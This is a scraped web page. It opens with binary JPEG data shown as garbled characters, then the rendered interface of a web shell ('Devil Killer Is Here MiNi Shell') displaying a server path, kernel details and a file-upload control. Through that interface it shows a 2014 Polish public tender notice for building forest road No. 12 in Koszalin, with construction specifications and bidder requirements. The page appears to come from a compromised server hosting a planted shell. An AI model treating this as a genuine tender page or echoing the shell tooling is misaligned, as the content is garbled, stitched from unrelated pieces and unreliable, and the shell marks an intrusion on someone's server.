JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141007/331048-N-2014.html

<p class="kh_header"><b>Sianów: Budowa drogi leśnej Nr 12 wraz z dojazdem z ulicy Rodła w Koszalinie o nawierzchni twardej ulepszonej (płyty typu JOMB), o długości 0,650 km, zlokalizowanej na działkach nr 306/1 i 307/11 w obrębie ewidencyjnym 0034 Koszalin, na terenie leśnictwa Koszalin.
Nr sprawy 2710-03/14.</b><br>
<b>Numer ogłoszenia: 331048 - 2014; data zamieszczenia: 07.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Karnieszewice , Trawica 8A, 76-004 Sianów, tel. 094 3185227, 3185228.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.karnieszewice.szczecinek.lasy.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jed.org.nieposiadająca osobowości prawnej zarządzająca mieniem skarbu państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa drogi leśnej Nr 12 wraz z dojazdem z ulicy Rodła w Koszalinie o nawierzchni twardej ulepszonej (płyty typu JOMB), o długości 0,650 km, zlokalizowanej na działkach nr 306/1 i 307/11 w obrębie ewidencyjnym 0034 Koszalin, na terenie leśnictwa Koszalin.
Nr sprawy 2710-03/14..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane (drogowe):
Budowa drogi leśnej Nr 12 wraz z dojazdem z ulicy Rodła w Koszalinie o nawierzchni twardej ulepszonej (płyty typu JOMB), o długości 0,650 km, zlokalizowanej na działkach nr 306/1 i 307/11 w obrębie ewidencyjnym 0034 Koszalin, na terenie leśnictwa Koszalin, a także wykonanie usług innych czynności, niezbędnych do wykonania budowy drogi.
Wykonawca winien wykonać roboty budowlane i przekazać zamawiającemu dokumentację powykonawczą w sposób umożliwiający Inwestorowi złożenie zawiadomienia właściwego organu nadzoru budowlanego o zakończeniu budowy.
Droga leśna przebiega przez grunty będące w zarządzie Lasów Państwowych - Nadleśnictwo Karnieszewice. Trasa drogi nie narusza stanu prawnego osób trzech. 
I.	STAN  ISTNIEJĄCY 
Projektowana droga leśna posiada zły stan techniczny, liczne wyboje, zastoiska wody, koleiny wypełnione rozluźnionym gruntem i wodą. Na początkowym odcinku drogi z uwagi na duży spadek podłużny występuje głębokie podłużne rozmycia jezdni. Gęsto porośnięte pobocza, zawyżone, krzaki i drzewa samosiejki w rowach oraz zamulenie rowów powoduje zatrzymanie wód opadowych na jezdni drogi. Istniejący przepust pod drogą zamulony.
Podłoże drogi stanowi grunt piaszczysty z domieszką części organicznych.
Teren przeznaczony pod składnicę porośnięty trawami. W koronie drogi mogą wystąpić karcze po ściętych drzewach.  
II.	STAN  PROJEKTOWANY 
Projektowany zakres robót związany jest z podwyższeniem parametrów technicznych 
i eksploatacyjnych drogi nr 12 z niewielką korektą jej przebiegu. 
Na podstawie wytycznych technicznych dla dróg leśnych oraz ustaleń z Inwestorem dla budowanej drogi ustalono następujące parametry techniczne:
- prędkość projektowa - 30 km/h;
- szerokość jezdni z płyt IOMB - 3,00 m;
- szerokość składnicy - 3,00 m;
- szerokość utwardzonych poboczy drogi - 0,30 m (obustronne), a na początkowym odcinku 1,0 m (lewostronne);
- szerokość poboczy gruntowych - 0,50 m;
- spadek poprzeczny jezdni z płyt IOMB - 3%;
- spadek poprzeczny składnicy - 3%;
- spadek poprzeczny poboczy - 6%;
Dojazd z ulicy Rodła - parametry techniczne j.w. 

1.  PROJEKTOWANA KONSTRUKCJA 
Projektowaną konstrukcję jezdni podzielono na odcinki ze względu na stan techniczny obecnej drogi, i tak:
-   w km 0+000 - 0+088,10   
  12,5 cm - płyty drogowe wielootworowe 100x75x12,5 na całej szerokości jezdni 
  15,0 cm - podbudowa zasadnicza - mieszanka kruszywa niezwiązanego 0-31,5 (mieszanka optymalna stabilizowana mechanicznie)  
Uwaga: droga w dużym spadku podłużnym, podłoże ustabilizowane, jezdnia podłużnie rozmyta wodami opadowymi
- w km 0+088,10 - 0+430,70
   12,5 cm - płyty drogowe wielootworowe 100x75x12,5 układane dwuśladowo 
   10,0 cm (średnia) - podbudowa zasadnicza - mieszanka kruszywa niezwiązanego 0-31,5 (mieszanka optymalna stabilizowana mechanicznie)  
Uwaga: droga o ustabilizowanym podłożu z lokalnymi wybojami, wymaga profilowania
- w km 0+430,70 - 0+606,70     
  12,5 cm - płyty drogowe wielootworowe 100x75x12,5 układane dwuśladowo 
  15,0 cm - podbudowa zasadnicza - mieszanka kruszywa niezwiązanego 0/31,5 (mieszanka optymalna stabilizowana mechanicznie)  
  20,0 cm - warstwa odsączająca
Uwaga: droga rozjeżdżona, w podłożu duża zawartość części organicznych, gruzu
- w km 0+606,70 - 0+621,50 skrzyżowanie dróg 
15,0 cm - nawierzchnia - mieszanka kruszywa niezwiązanego 0/31,5 (mieszanka optymalna stabilizowana mechanicznie) 
20,0 cm - warstwa odsączająca
Uwaga: droga rozjeżdżona, w podłożu duża zawartość części organicznych, gruzu
Uwaga: 
- wypełnienie pomiędzy płytami o szerokości 1,0 m należy wykonać mieszanką kruszyw niezwiązanych 0/31,5 (materiał taki sam jak na nawierzchnię jezdni na skrzyżowaniu na końcu opracowania) 
-    poszerzenie jezdni o szerokości 1,0 m na łuku poziomym W7 należy wykonać z płyt IOMB 
-  pobocza utwardzone o szerokości 0,30 m grubości 12,5 cm (grubość płyty) i 1,0 m grubości 15,0 cm w km 0+000 - 0+088,12 należy wykonać mieszanką kruszyw niezwiązanych 0/31,5 (mieszanka optymalna stabilizowana mechanicznie)
- dojazd z ulicy Rodła - w km 0+000 - 0+041,00 
  12,5 cm - płyty drogowe wielootworowe 100x75x12,5 układane dwuśladowo 
  15,0 cm - podbudowa zasadnicza - mieszanka kruszywa niezwiązanego 0/31,5 (mieszanka optymalna stabilizowana mechanicznie)  
  30,0 cm - warstwa odsączająca
Uwaga: wypełnienie pomiędzy płytami o szerokości 1,0 m oraz utwardzone pobocza należy wykonać z kostki kamiennej 8-11 na podsypce cementowo-piaskowej 1:4 grubości 3 cm  
2.  PROJEKTOWANA TRASA W  PLANIE
Drogę leśną na całej długości pomierzono geodezyjnie i wykonano mapę w skali 1:500. Na podstawie pomiaru geodezyjnego zaprojektowano przebieg drogi w planie na długości 621,50 mb.
Załamania trasy wyokrąglono 10 łukami poziomymi o promieniu od 21,0 m do 250,0 m. Przyjęto zasadę niwelowania załamań trasy lekko prostując jej przebieg. 
Tylko na łuku poziomym W7 o R=21,0 m zaprojektowano poszerzenia o szerokości 1,0 m z płyt IOMB. Poszerzenie wewnętrzne łuku poziomego posiada proste przejściowe o zmiennej długości 25,10 i 19,0 m wykonane z mieszanki kruszywa niezwiązanego 0/31,5. 
Dojazd z ulicy Rodła dowiązano do przebiegu ulicy Rodła.
Przebieg trasy przedstawiono na Planie sytuacyjnym rys. nr 1.
3.  PROFIL PODŁUŻNY
Zaprojektowana niweleta drogi nawiązuje do stanu istniejącego. Przebieg drogi w terenie odzwierciedla ukształtowanie terenu. W celu wyeliminowania różnic wysokościowych przyjęto założenie podniesienia niwelety projektowanej drogi w stosunku do stanu istniejącego. W celu poprawy warunków przejezdności dokonano korekty profilu podłużnego likwidując lokalne zaniżenia i załamania.
Dojazd z ulicy Rodła dowiązano wysokościowo do ulicy Rodła i projektowanej niwelety drogi leśnej nr 12.
Profile podłużne rys. nr 2.1 i 2.2.
4.  PRZEKRÓJ NORMALNY i POPRZECZNY 
Na projektowanej drodze leśnej  zaprojektowano n/w spadki poprzeczne, i tak:
= w km 0+000 - 0+088,12 spadek poprzeczny jednostronny 3% 
= w km 0+088,12 - 0+409,10 spadek poprzeczny daszkowy 3% 
= w km 0+409,10 - 0+429,18 spadek poprzeczny jednostronny 3% 
= w km 0+429,18 - 0+606,70 spadek poprzeczny daszkowy 3% 
= w km 0+606,70 na skrzyżowaniu dostosowany do terenu  
Zaprojektowano 1 składnicę lewostronną w km 0+553,70 - 0+603,70 o nawierzchni gruntowej ze spadkiem poprzecznym 3% w kierunku zewnętrznym (do rowu). 
Przekroje normalne przedstawiono na rys. nr 3 i przekroje poprzeczne na rys. nr 4.
5.  ODWODNIENIE
Odwodnienie powierzchniowe obustronnymi rowami przydrożnymi. Z uwagi na występujący w podłożu grunt piaszczysty rowy przydrożne pełnią funkcję rowów odparowujących i rozsączających wody opadowe i roztopowe. 
W km 0+196,75 istniejący przepust do odmulenia, oczyszczenia z traw i samosiejek, na długości min.10 m od wlotów przepustu należy udrożnić rowy poprzez oczyszczenie, odkrzaczenie i wyprofilowanie.  
W km 0+478,40 zaprojektowano nowy przepust z rur karbowanych PEHD Pecor OPTIMA o średnicy 40 cm długości 7,0 m z obustronnymi ściankami czołowymi.  Ścianki czołowe należy wykonać alternatywnie z betonu lub bloczków betonowych lub prefabrykatów betonowych. 
W km 0+125,77 skrzyżowanie z dojazdem z ulicy Rodła posiada wzdłuż rowu przydrożnego przepust z rur karbowanych Pecor OPTIMA średnicy 40 cm długości 13,0 m z obustronnymi ściankami czołowymi.
Rowy przydrożne są rowami o głębokości do 0,80 m dostosowane od rzędnej niwelety i szerokości dna rowu min.0,40 m. Dno i skarpy rowu należy wyprofilować po wykonaniu robót ziemnych. 
Rowy przydrożne podzielono na dwie grupy:
- rowy istniejące do odmulenia z profilowaniem, oczyszczenia z traw i samosiejek w;
 km 0+095 - 0+196,75 rowy obustronne 
 km 0+196,75 - 0+253,40 lewy
 km 0+277 - 0+345 lewy
 km 0+354 - 0+366 lewy
- rowy istniejące w zaniku zaprojektowano całkowite odtworzenie lub wykonanie nowych w;
 km 0+366 - 0+411 lewostronny 
 km 0+426,90 -  0+606,70 lewostronny
 km 0+431 - 0+526 prawostronny
 w km 0+478,40 rów odpływowy o długości 30 m
W km 0+326,90 występujący przepust do likwidacji, rów do wykonania na długości 23,0 m.
Ściek betonowy prefabrykowany typu korytkowego 50x60x15 zaprojektowano w km 0+000 - 0+077 ułożony na ławie z betonu C8/10 grubości 10 cm oraz z odprowadzeniem dwoma ściekami skarpowymi typu trapezowego ułożonymi na podsypce piaskowo-cementowej 1:4 grubości 10 cm. Zakończenie ścieków skarpowych stanowi zabruk z kamienia nieobrobionego z wypełnieniem spoin zaprawą cementową o szerokości 0,60 m i długości 1,00 m.  
Na planie sytuacyjny (rys. nr 1) przedstawiono przebieg rowów w terenie.  
6.  ROBOTY PRZYGOTOWAWCZE, ZIEMNE I WYKOŃCZENIOWE
W ramach robót przygotowawczych należy przygotować podłoża pod konstrukcję drogi.  Zakres robót obejmuje oprócz robót ziemnych wykonanie profilowania i zagęszczenie podłoża w celu zlikwidowania głębokich wyboii, muld porośniętych trawami oraz usunięcia błota. Występujący rozluźniony grunt należy usunąć i wykonać nasyp po projektowaną konstrukcję drogi.    
Grunt z wykopów można wykorzystać do wykonania poboczy gruntowych, do zasypania dołów po usunięciu karczy oraz profilowanie terenu pod składnicę drewna. Nieprzydatny, zanieczyszczony należy wywieźć w miejsce wskazane przez Inwestora. 
W ramach robót przygotowawczych należy usunąć wszystkie krzewy, drzewa i karcze znajdujące się w pasie robót drogowych, w tym w rowach również. Doły zasypać gruntem pochodzącym z wykopów robót ziemnych. 
Pobocza gruntowe drogi o szerokości 0,50 m należy wyprofilować (plantować usuwając porastające je trawy) ze spadkiem 6%.   
Zjazdy na posesje:
-  w km 0+261,45 P - nawierzchnia z kostki betonowej do rozbiórki, wykonanie nowego zjazdu o powierzchni 23,0 m2
-  w km 0+347,50 i 0+350,10 (podwójny) - istniejący ściek trójkątny do rozbiórki, ułożenie nowego o długości 7,50 m, nawierzchnia zjazdów do przełożenia.
-  na pozostałych zjazdach wyrównanie z MKN  (mieszanka kruszyw niezwiązanych)

2. Lokalizacja inwestycji:
Leśnictwo Koszalin - na działkach nr 306/1 i 307/11 w obrębie ewidencyjnym 0034 Koszalin.

3. Szczegółowy opis przedmiotu zamówienia określony został w: 

a) dokumentacji projektowej (projekt budowlany wykonawczy)
b) Specyfikacjach Technicznych Wykonania i Odbioru Robót
c) przedmiarze robót 

Wartość szacunkowa zamówienia nie przekracza kwoty określonej w art. 11 ust. 8 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity z 28 maja 2013r. - Dz. U. z 2013r., poz. 907) z późniejszymi zmianami oraz aktów wykonawczych do ustawy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających,
o których mowa w art. 67 ust. 1 pkt 6. Zamówienia uzupełniające dotyczą powtórzenia robót objętych zamówieniem podstawowym tego samego rodzaju zamówień 
o wartości do 50% zamówienia podstawowego (roboty dotyczące budowy drogi leśnej Nr 12 o nawierzchni twardej ulepszonej - płyty betonowe typu JOMB w leśnictwie Koszalin.
2. Zamawiający przewiduje możliwość udzielenia zamówień dodatkowych, jeśli spełnione zostaną przesłanki udzielenia takiego zamówienia, określone w art. 67 ust.1 pkt 5 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.23-7, 45.23.32.26-9, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 5.000,00 złotych (słownie: pięć tysięcy 00/100 złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu dotyczących posiadania uprawnień do wykonywania określonej działalności. Wykonawca w tym zakresie złoży stosowne oświadczenie o spełnieniu warunków udziału w postępowaniu.
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej trzy zamówienia (zadania) polegające na budowie lub przebudowie dróg o nawierzchni      z płyt żelbetowych oraz tłuczniowej o wartości każdego zamówienia (zadania) co najmniej 150.000,00 zł netto (słownie: sto pięćdziesiąt tysięcy 00/100 złotych)
-  Wykonawca w tym zakresie złoży oświadczenie o spełnianiu warunków udziału        w postępowaniu oraz dokumenty wskazane p. XI specyfikacji. 
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował sprzętem mechanicznym: samochód samowyładowczy (min. 1 szt.) o ładowności powyżej 5,0 ton (wskazane około 12 ton), koparko-ładowarką lub koparką (min. 1 szt.), równiarką drogową samojezdną (min. 1 szt.) lub/i spycharką (min. 1 szt.) oraz walcem drogowym (min. 1 szt.);
W celu potwierdzenia, że wykonawca dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia, złoży stosowne oświadczenie (zał. nr 2) oraz wykaz sprzętu jakim będzie dysponował na czas realizacji zamówienia z określeniem podstawy dysponowania (czy jest to sprzęt będący własnością wykonawcy, czy też wynajęty, dzierżawiony, użyczony) wg wzoru będącego załącznikiem nr 6 
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował osobą posiadającą uprawnienia do kierowania robotami budowlanymi drogowymi, aktualny wpis do właściwej izby inżynierskiej i ubezpieczenie odpowiedzialności cywilnej    
Wykonawca w tym zakresie złoży oświadczenie o spełnieniu warunków udziału           w postępowaniu oraz wykaz osób odpowiedzialnych za kierowanie robotami.
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli:
- wykaże posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia (roboty budowlane - drogowe), przy czym kwota tego ubezpieczenia nie może być mniejsza niż 200.000,00 złotych
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
